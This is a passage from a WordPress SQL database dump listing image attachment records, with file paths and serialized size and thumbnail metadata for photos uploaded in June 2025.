eywords\";a:0:{}}}'),
(1628,518,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:64:\"2025/06/509432476_122233488362202781_6256446827292890718_n-1.jpg\";s:8:\"filesize\";i:399776;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"509432476_122233488362202781_6256446827292890718_n-1-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19723;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"509432476_122233488362202781_6256446827292890718_n-1-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:141159;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"509432476_122233488362202781_6256446827292890718_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8168;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:64:\"509432476_122233488362202781_6256446827292890718_n-1-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88080;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"509432476_122233488362202781_6256446827292890718_n-1-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:254723;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"509432476_122233488362202781_6256446827292890718_n-1-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20869;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1629,520,'_wp_attached_file','2025/06/510004299_122233487084202781_6268732022722924528_n-1.jpg'),
(1630,519,'_wp_attached_file','2025/06/508566839_122233488350202781_5291093760071081349_n-1.jpg'),
(1631,519,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:64:\"2025/06/508566839_122233488350202781_5291093760071081349_n-1.jpg\";s:8:\"filesize\";i:381873;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"508566839_122233488350202781_5291093760071081349_n-1-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19454;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"508566839_122233488350202781_5291093760071081349_n-1-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:137193;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"508566839_122233488350202781_5291093760071081349_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7990;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:64:\"508566839_122233488350202781_5291093760071081349_n-1-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86082;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"508566839_122233488350202781_5291093760071081349_n-1-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:246217;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"508566839_122233488350202781_5291093760071081349_n-1-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21683;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1632,520,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:64:\"2025/06/510004299_122233487084202781_6268732022722924528_n-1.jpg\";s:8:\"filesize\";i:298060;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"510004299_122233487084202781_6268732022722924528_n-1-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16573;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"510004299_122233487084202781_6268732022722924528_n-1-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106889;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"510004299_122233487084202781_6268732022722924528_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7449;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:64:\"510004299_122233487084202781_6268732022722924528_n-1-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68102;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"510004299_122233487084202781_6268732022722924528_n-1-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:190491;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"510004299_122233487084202781_6268732022722924528_n-1-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15932;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1633,521,'_wp_attached_file','2025/06/510226912_122233485428202781_3363047737425267891_n-1.jpg'),
(1634,521,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:64:\"2025/06/510226912_122233485428202781_3363047737425267891_n-1.jpg\";s:8:\"filesize\";i:579804;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"510226912_122233485428202781_3363047737425267891_n-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26550;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"510226912_122233485428202781_3363047737425267891_n-1-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:207115;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"510226912_122233485428202781_3363047737425267891_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10300;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:65:\"510226912_122233485428202781_3363047737425267891_n-1-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:217453;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"510226912_122233485428202781_3363047737425267891_n-1-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:364266;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"510226912_122233485428202781_3363047737425267891_n-1-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22739;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1635,522,'_wp_attached_file','2025/06/510905776_122233487132202781_8330824708694035019_n-1.jpg'),
(1636,522,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:64:\"2025/06/510905776_122233487132202781_8330824708694035019_n-1.jpg\";s:8:\"filesize\";i:336400;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"510905776_122233487132202781_8330824708694035019_n-1-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18765;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"510905776_122233487132202781_8330824708694035019_n-1-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122858;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"510905776_122233487132202781_8330824708694035019_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7795;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:64:\"510905776_122233487132202781_8330824708694035019_n-1-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77697;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"510905776_122233487132202781_8330824708694035019_n-1-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:217631;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"510905776_122233487132202781_8330824708694035019_n-1-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17566;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1637,523,'_wp_attached_file','2025/06/508658382_122233208516202781_580202122741841251_n.jpg'),
(1638,523,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:61:\"2025/06/508658382_122233208516202781_580202122741841251_n.jpg\";s:8:\"filesize\";i:423695;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:61:\"508658382_122233208516202781_580202122741841251_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21565;}s:5:\"large\";a:5:{s:4:\"file\";s:62:\"508658382_122233208516202781_580202122741841251_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:154547;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:61:\"508658382_122233208516202781_580202122741841251_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9079;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:61:\"508658382_122233208516202781_580202122741841251_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97502;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:63:\"508658382_122233208516202781_580202122741841251_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:273640;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:61:\"508658382_122233208516202781_580202122741841251_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22060;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1639,524,'_wp_attached_file','2025/06/507733863_122233208372202781_4817239570500527554_n.jpg'),
(1640,524,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2025/06/507733863_122233208372202781_4817239570500527554_n.jpg\";s:8:\"filesize\";i:453861;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"507733863_122233208372202781_4817239570500527554_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21670;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"507733863_122233208372202781_4817239570500527554_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:162908;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"507733863_122233208372202781_4817239570500527554_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8928;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"507733863_122233208372202781_4817239570500527554_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100892;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"507733863_122233208372202781_4817239570500527554_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:291454;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"507733863_122233208372202781_4817239570500527554_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22059;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1641,525,'_wp_attached_file','2025/06/508557200_122233205786202781_8640392528716628766_n.jpg'),
(1642,525,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2025/06/508557200_122233205786202781_8640392528716628766_n.jpg\";s:8:\"filesize\";i:478583;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"508557200_122233205786202781_8640392528716628766_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21273;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"508557200_122233205786202781_8640392528716628766_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:170965;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"508557200_122233205786202781_8640392528716628766_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8705;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"508557200_122233205786202781_8640392528716628766_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105410;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"508557200_122233205786202781_8640392528716628766_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:308844;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"508557200_122233205786202781_8640392528716628766_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22585;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1643,526,'_wp_attached_file','2025/06/508658382_122233208516202781_580202122741841251_n-1.jpg'),
(1644,526,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:63:\"2025/06/508658382_122233208516202781_580202122741841251_n-1.jpg\";s:8:\"filesize\";i:423695;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:63:\"508658382_122233208516202781_580202122741841251_n-1-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21565;}s:5:\"large\";a:5:{s:4:\"file\";s:64:\"508658382_122233208516202781_580202122741841251_n-1-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:154547;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:63:\"508658382_122233208516202781_580202122741841251_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9079;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:63:\"508658382_122233208516202781_580202122741841251_n-1-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97502;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:65:\"508658382_122233208516202781_580202122741841251_n-1-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:273640;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:63:\"508658382_122233208516202781_580202122741841251_n-1-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22060;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1645,527,'_wp_attached_file','2025/06/508593390_122233208462202781_2021394309803679795_n.jpg'),
(1646,527,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2025/06/508593390_122233208462202781_2021394309803679795_n.jpg\";s:8:\"filesize\";i:562697;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"508593390_122233208462202781_2021394309803679795_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23882;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"508593390_122233208462202781_2021394309803679795_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:196504;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"508593390_122233208462202781_2021394309803679795_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9620;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"508593390_122233208462202781_2021394309803679795_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120341;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"508593390_122233208462202781_2021394309803679795_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:356136;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"508593390_122233208462202781_2021394309803679795_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25242;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1647,528,'_wp_attached_file','2025/06/508690066_122233208312202781_1715080013664278025_n.jpg'),
(1648,528,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2025/06/508690066_122233208312202781_1715080013664278025_n.jpg\";s:8:\"filesize\";i:605216;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"508690066_122233208312202781_1715080013664278025_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25476;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"508690066_122233208312202781_1715080013664278025_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:211173;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"508690066_122233208312202781_1715080013664278025_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10068;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"508690066_122233208312202781_1715080013664278025_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:128894;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"508690066_122233208312202781_1715080013664278025_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:383246;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"508690066_122233208312202781_1715080013664278025_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25577;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1649,529,'_wp_attached_file','2025/06/508778331_122233208414202781_4423758755946843051_n.jpg'),
(1650,529,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2025/06/508778331_122233208414202781_4423758755946843051_n.jpg\";s:8:\"filesize\";i:430859;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"508778331_122233208414202781_4423758755946843051_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19687;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"508778331_122233208414202781_4423758755946843051_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:152013;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"508778331_122233208414202781_4423758755946843051_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8265;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"508778331_122233208414202781_4423758755946843051_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94001;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"508778331_122233208414202781_4423758755946843051_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:274828;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"508778331_122233208414202781_4423758755946843051_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17748;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1651,530,'_wp_attached_file','2025/06/508840596_122233206260202781_3423997656757381309_n.jpg'),
